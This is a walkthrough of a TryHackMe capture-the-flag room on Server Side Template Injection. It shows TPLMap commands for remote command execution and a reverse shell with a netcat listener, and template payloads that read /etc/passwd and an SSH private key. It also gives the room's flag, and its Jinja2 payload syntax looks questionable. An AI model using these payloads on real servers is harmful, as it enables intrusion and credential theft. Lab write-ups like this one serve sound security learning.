Introduction
In this walkthrough, we covered manual and automatic methods to detect Server Side Template Injection or SSTI. We used ZTH: Obscure Web Vulns room from TryHackMe .
SSTI or Server Side Template Injection
First off, what exactly is SSTI? I learned that it’s a vulnerability that can occur when a web application uses a template engine to generate dynamic content, but it doesn’t properly sanitize the user’s input. This means that if you can inject code into the template, the server will execute it. Think of it like this: if a website is building a page using a template and it takes your name to display a friendly “Hello, [Your Name]!”, an SSTI vulnerability would allow you to insert code instead of your name, and the server would run it.
I found that this type of vulnerability is common in applications like wikis, blogs, and content management systems. A great way to test for it is to use a simple arithmetic expression like {{2+2}}
. If the website displays “4” instead of “{{2+2}}”, you’ve likely found an SSTI vulnerability. For anyone wanting to dig deeper, I highly recommend checking out the articles on PortSwigger’s website.
Putting Theory into Practice
I found a web application to test my newfound knowledge. It had a simple input box that asked, “What is two plus two?”. When I typed “4”, it confirmed the correct answer. By looking at the page source, I could see that my input was being taken and displayed back to me. This was the perfect place to try out some SSTI payloads.
Automatic Exploitation with TPLMap
To start, I decided to use a tool called TPLMap, which is designed specifically for finding and exploiting SSTI. It’s a powerful tool that can automate the entire process.
I ran TPLMap against the vulnerable URL and pointed it to the parameter I suspected was vulnerable. The tool quickly confirmed that the application was using the Jinja2 template engine and that it was indeed vulnerable. TPLMap even showed me that I could get a shell on the server!
To test this, I used TPLMap to execute the id
command on the server, and it worked perfectly, showing me the user ID. Next, I set up a Netcat listener on my own machine and used TPLMap to get a reverse shell, giving me direct command-line access to the server.
Manual Exploitation
After seeing how easy it was with a tool, I wanted to try exploiting the vulnerability manually. I went back to the web application and entered {{2+2}}
into the input box. As expected, the page returned “4”.
I then tried a more advanced payload to see if I could read files from the server. I used a payload designed to execute commands and read the /etc/passwd
file. It worked! The contents of the file were displayed right there on the web page. I also tried to read an SSH private key, but that attempt resulted in an error.
The Final Challenge
The video I was following concluded with a challenge: find a flag located at /flag
on the server. I decided to try both my automatic and manual methods.
First, I used TPLMap with a command to read the /flag
file. It immediately returned the flag: “cocktails“.
Then, for the manual approach, I used my file-reading payload and simply replaced /etc/passwd
with /flag
. And just like that, the flag “cocktails” was displayed on the page.
Technical Commands Used
Here are the technical commands I used on the terminal during this process:
python2 tplmap.py -u <URL> -d name
- This command runs TPLMap to test a URL for SSTI, specifying the vulnerable parameter with the
-d
flag.
- This command runs TPLMap to test a URL for SSTI, specifying the vulnerable parameter with the
python2 tplmap.py -u <URL> -d name --os-cmd id
- This command uses TPLMap to execute the
id
command on the target server.
- This command uses TPLMap to execute the
nc -lvp 4545
- This sets up a Netcat listener on port 4545, waiting for an incoming connection (like a reverse shell).
python2 tplmap.py -u <URL> -d name --os-shell
- This command instructs TPLMap to attempt to establish a reverse shell to a specified IP and port.
python2 tplmap.py -u <URL> -d name --os-cmd "cat /etc/passwd"
- This command uses TPLMap to read the
/etc/passwd
file from the server.
- This command uses TPLMap to read the
{{_self.0.popen('cat /etc/passwd').read()}}
- This is a manual SSTI payload for Jinja2 that executes the
cat /etc/passwd
command and displays the output.
- This is a manual SSTI payload for Jinja2 that executes the
{{_self.0.popen('cat /home/test/.ssh/id_rsa').read()}}
- A manual payload to attempt to read an SSH private key.
python2 tplmap.py -u <URL> -d name --os-cmd "cat /flag"
- The TPLMap command used to automatically find and display the challenge flag.
{{_self.0.popen('cat /flag').read()}}
- The manual payload used to find and display the challenge flag.
Room Answers
What is the flag?